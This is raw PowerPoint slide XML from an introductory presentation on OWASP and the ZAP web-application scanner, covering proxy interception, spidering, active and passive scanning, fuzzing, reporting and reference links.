        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13983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Functioning of ZAP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Functioning of ZAP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Intercepting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Traditional and AJAX spiders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Automated scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Analysing the scan results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IN" dirty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0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Intercepting the traffic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2400" dirty="0" smtClean="0"/>
              <a:t>Configure the browser to use ZAP proxy server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can intercept all traffic to a user specified website/server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can click on any link on the site to observe the captured request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can modify this request before forwarding it to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The response can also be intercepted before forwarding it to the browser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6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Spidering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ZAP spider is needed to crawl links that are not directly visible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>It automatically discovers and explores the hidden links for a site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Newly discovered URLs are shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>URLs whose domain is different from target are also listed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0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Scanning the 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Active Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Can select a site to be attacked under the ‘Attack’ section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ool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>actually attacks the application in all possible ways to find out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>all possible vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Some of the issues active scan looks for are :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>External Redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Parameter tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Directory browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>All findings shown under ‘Alerts’ tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22538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OWASP Top 10 Application Security Risks – 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Setting up the Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Functioning of ZAP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References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47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Scanning the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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Passive scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Unlike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>ctive scanning, passive scanning does not change any responses coming from server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Only looks at responses to identify vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Safe to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Some of the issues passive scanning looks for :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Incomplete or no cache-control and pragma HTTP Header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cross-domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>JavaScript source file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Site Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Autocomplete in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>authentication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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Reporting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tool’s report is free from false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Security analyst can determine which vulnerabilities are false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>It also shows the level of threat associated with the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>High, Medium, Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Analysed results are used to generate the report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Can generate a detailed report of all vulnerabilities; can be exported to HTML file and viewed in a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/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6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ZAP features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Port Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>feature scans open ports on the target site and lists them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Encode/Decode Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This feature is used to encode/ decode the text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>entered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Fuzzing is the process of sending invalid and unexpected input to the application to observe the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>behaviour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Extensions for ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>ZAP has plugins like LDAP Injection, session fixation etc. and many others that can be found on </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://code.google.com/p/zap-extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0" smtClean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2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2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ZAP- Firefox of Web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ZAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>is a free, open-source community developed tool aimed at making the online world more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>secure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Some of the ideals that have driven ZAP are listed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>below</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>users develop and apply application security skills</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>uild </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>a competitive, open source, and community oriented platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>rovide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>an extensible platform for testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>esigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to be easy to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Raise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>the bar for other security tools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of ZAP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scanners to detect more vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extend API, better integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzzing analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to use, better help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0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Open Web Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Main_Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>OWASP Top Ten Project </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cross-site Scripting (XSS) </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>OWASP Zed Attack Proxy Project </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Zaproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://code.google.com/p/zaproxy/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43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ZAP Blog: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://zaproxy.blogspot.co.uk/</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Penetration Testing For Developers </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://pentest4devs.blogspot.in/2010/09/exploring-web-application-with-zap.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Setting Up Web Security Learning Lab </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://people.mozilla.org/~mcoates/WebSecurityLab.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Webgoat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u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://www.owasp.org/index.php/OWASP_WebGoat_Project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547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!!!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Questions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1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About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>OWASP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Full form: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Open Web Application Security Project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open-source application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to create freely-available </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Articles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Methodologies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Documentation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Technologies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106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OWASP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provides free and open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Application security tools and standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Complete books on application security testing, secure code development, and security code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Standard security controls and libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Local chapters worldwide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cutting edge research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Extensive conferences worldwide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Mailing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>lists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5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OWASP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OWASP was started on September 9, 2001 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>It was started by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Curphey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Dennis Groves.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/>
              <a:t>late 2003, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Jeff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Williams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> served as the volunteer Chair of OWASP until September 2011.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current chair is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Michael Coates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, and vice chair is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Eoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>Keary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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Foundation was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>established in 2004 and supports the OWASP infrastructure and projects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0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OWASP-Zed Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Proxy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Zed Attack Proxy (ZAP) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>finding vulnerabilities in web applications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Designed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to be used by people with a wide range of security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Ideal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>new developers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>and functional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>testers who are new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to penetration testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>addition to an experienced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>pen testers toolbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Released September 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Current Version -: 2.0.0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8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ZAP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Free, Open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cross platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Easy to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Easy to install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Internationalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
